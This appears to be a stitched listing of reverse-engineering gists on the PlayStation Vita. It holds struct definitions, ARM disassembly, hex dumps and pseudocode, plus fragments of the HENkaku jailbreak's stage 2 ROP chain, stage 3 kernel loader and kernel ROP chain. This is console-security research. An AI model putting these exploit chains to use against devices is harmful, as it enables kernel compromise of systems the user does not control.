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typedef struct {
char name[0x100];
void* data;
u32 size;
u32 unk;
u8 hash[0x14];
u8 padding[0x0C];
} prsh_section;
typedef struct {
ROM:005161C0 ANDEQ R0, R0, R0
ROM:005161C4 ANDEQ R0, R0, R0
ROM:005161C8 CLREX
ROM:005161CC STR LR, [SP,#-8]
ROM:005161D4 STR LR, [SP,#-4]
ROM:005161D8 SUB SP, SP, #8
ROM:005161DC CMP R12, #0x500 -> Max R12 value is 0x500 :(
ROM:005161E0 BCS loc_516208
ROM:005161E4 CMP R12, #0x100
sceSblSmSchedProxyGetStatus(u32 sm_handle, u32 *out_buf)
// Check global status var
u32 state = SMSCHED_STATUS;
// SmSched is not initialized
if (state != 0x01)
return 0x800F0426;
// NULL pointer
0x00000000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x00000010: F9 80 85 00 09 81 2A 00 02 10 00 00 0A 00 00 00
0x00000020: 01 00 00 00 00 00 08 28 80 00 00 00 C0 00 F0 00
0x00000030: 00 00 00 00 FF FF FF FF 00 00 00 00 00 00 00 00
0x00000040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x00000050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x00000060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x00000070: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
// Set shared memory region
// Do some Sysroot stuff
// Gets address 0x00400000 from Sysroot
u32 **phys_addr_ptr;
u32 *mem_addr = SceSysrootForKernel_C8C8C321(0x100);
0x00000000: 00 02 20 9F 80 05 08 00 E0 59 00 00 97 11 49 00
0x00000010: A8 05 30 00 80 05 08 00 00 00 00 00 09 50 49 00
0x00000020: 00 C9 21 00 00 C9 21 00 C0 8B 21 00 80 A5 21 00
0x00000030: C0 8B 21 00 80 A5 21 00 00 B2 20 00 C0 65 20 00
0x00000040: 00 B2 20 00 C0 65 20 00 C0 65 20 00 C0 65 20 00
0x00000050: C0 65 20 00 C0 65 20 00 C0 21 20 00 C0 65 20 00
0x00000060: C0 21 20 00 C0 65 20 00 00 47 20 00 00 47 20 00
0x00000070: 00 47 20 00 00 47 20 00 C0 95 20 00 00 47 20 00
0x00000080: C0 95 20 00 00 47 20 00 40 0B 20 00 40 0B 20 00
0x00000090: 40 0B 20 00 40 0B 20 00 40 31 20 00 40 0B 20 00
hexkyz / henkaku_stage2_rop.txt
Created October 19, 2016 19:12
HENkaku - Stage 2 (ROP chain)
0x00(x_stack + 0x00008A8C) = scesysmem_base + 0x00000031
0x00(x_stack + 0x00008A90) = 0x08106803
0x00(x_stack + 0x00008A94) = scesysmem_base + 0x0001EFF1
0x00(x_stack + 0x00008A98) = 0x00000038
0x00(x_stack + 0x00008A9C) = scesysmem_base + 0x0001EFE1
0x00(x_stack + 0x00008AA0) = scesysmem_base + 0x00000347
0x00(x_stack + 0x00008AA4) = scesysmem_base + 0x000039EB
0x00(x_stack + 0x00008AA8) = scesysmem_base + 0x0001B571
0x00(x_stack + 0x00008AAC) = 0x00000000
0x00(x_stack + 0x00008AB0) = scesysmem_base + 0x00001E43
hexkyz / henkaku_stage3_kxloader.c
Created October 19, 2016 18:50
HENkaku - Stage 3 (Kernel loader)
// Entry point
sub_00000010(scesysmem_base, payload_addr)
r4 = scesysmem_base
r5 = scesysmem_base >> 0x20
// Decrypt and launch HENkaku's payload
hexkyz / henkaku_stage3_pseudocode.c
Created October 19, 2016 18:48
HENkaku - Stage 3 (Pseudo-code)
// Allocate a new memory block
char* memblock_name = "Magic";
uint32_t memblock_type = 0x1020D006;
uint32_t memblock_size = 0xA0000;
void* memblock_opts = 0x00000000;
uint32_t memblock_id = kern_memblock_alloc(memblock_name, memblock_type, memblock_size, memblock_opts, 0);
// Retrieve the memory block's address into a buffer
uint32_t *out_buf;
kern_memblock_getaddr(memblock_id, out_buf);
hexkyz / henkaku_stage3_krop.txt
Created October 19, 2016 18:36
HENkaku - Stage 3 (Kernel ROP)
// Kernel ROP chain
scesysmem_base + 0x00000347
0x00(x_stack + 0x00008A8C) = scesysmem_base + 0x00000031 // PC
scesysmem_base + 0x00000031